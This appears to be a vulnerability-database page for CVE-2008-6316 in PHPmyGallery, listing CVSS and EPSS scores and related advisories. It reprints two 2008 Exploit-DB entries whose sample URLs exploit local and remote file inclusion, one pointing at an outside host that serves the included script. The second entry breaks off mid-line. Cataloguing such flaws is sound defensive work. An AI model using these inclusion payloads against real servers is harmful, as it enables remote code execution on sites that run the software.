CVE-2008-6316
published 2009-02-27CVE-2008-6316: Directory traversal vulnerability in _conf/core/common-tpl-vars.php in PHPmyGallery 1.0 beta2 allows remote attackers to include and execute arbitrary local…
PriorityP334medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.97%
78.0th percentile
Directory traversal vulnerability in _conf/core/common-tpl-vars.php in PHPmyGallery 1.0 beta2 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter, a different issue than CVE-2008-6316 and a different vector than CVE-2008-6318.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpmygallery | phpmygallery | — | — |
| phpmygallery | phpmygallery | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-gmpp-xvgm-fpmg: Directory traversal vulnerability in _conf/_php-core/common-tpl-vars
ghsa_unreviewed·2022-05-17·CVSS 6.8
CVE-2008-6317 [MEDIUM] CWE-22 GHSA-gmpp-xvgm-fpmg: Directory traversal vulnerability in _conf/_php-core/common-tpl-vars
Directory traversal vulnerability in _conf/_php-core/common-tpl-vars.php in PHPmyGallery 1.5 beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf[lang] parameter, a different issue than CVE-2008-6318. NOTE: this might be the same issue as CVE-2008-6316.
GHSA
GHSA-xp68-m589-2r25: Directory traversal vulnerability in _conf/core/common-tpl-vars
ghsa_unreviewed·2022-05-17·CVSS 6.8
CVE-2008-6316 [MEDIUM] CWE-22 GHSA-xp68-m589-2r25: Directory traversal vulnerability in _conf/core/common-tpl-vars
Directory traversal vulnerability in _conf/core/common-tpl-vars.php in PHPmyGallery 1.0 beta2 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter, a different issue than CVE-2008-6316 and a different vector than CVE-2008-6318.
GHSA
GHSA-2x7j-g4wr-p52p: PHP remote file inclusion vulnerability in _conf/core/common-tpl-vars
ghsa_unreviewed·2022-05-17·CVSS 6.8
CVE-2008-6315 [MEDIUM] CWE-94 GHSA-2x7j-g4wr-p52p: PHP remote file inclusion vulnerability in _conf/core/common-tpl-vars
PHP remote file inclusion vulnerability in _conf/core/common-tpl-vars.php in PHPmyGallery 1.0 beta2 allows remote attackers to execute arbitrary PHP code via a URL in the confdir parameter, a different issue than CVE-2008-6316.
No detection rules found.
Exploit-DB
PHPmyGallery 1.5beta - '/common-tpl-vars.php' Local/Remote File Inclusion
exploitdb·2008-12-09
CVE-2008-6318 PHPmyGallery 1.5beta - '/common-tpl-vars.php' Local/Remote File Inclusion
PHPmyGallery 1.5beta - '/common-tpl-vars.php' Local/Remote File Inclusion
---
Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities
Script Name: Phpmygallery
Version: 1.5beta
Autor: CoBRa_21
My Site: www.ipbul.org
Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip
Exploit:
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LFİ] (Windows Only)
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI]
Not: Tüm İslam Aleminin Kurban Bayramı Mobarek Olsun
# milw0rm.com [2008-12-09]
Exploit-DB
PHPmyGallery 1.0beta2 - Local/Remote File Inclusion
exploitdb·2008-12-09
CVE-2008-6317 PHPmyGallery 1.0beta2 - Local/Remote File Inclusion
PHPmyGallery 1.0beta2 - Local/Remote File Inclusion
---
[~] PHPmyGallery v~1.0beta2 RFi/LFi Multiple Remote Vuln.
[~]
[~] download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.0beta2.zip
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] Date: 08/12/2008
[~]
[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
file:
_conf/core/common-tpl-vars.php
c0de:
require($confdir.'lang/langpack.'.$lang.'.php'); ( line 23 )
rfi:
http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?
lfi:
htt
No writeups or analysis indexed.
2009-02-27
Published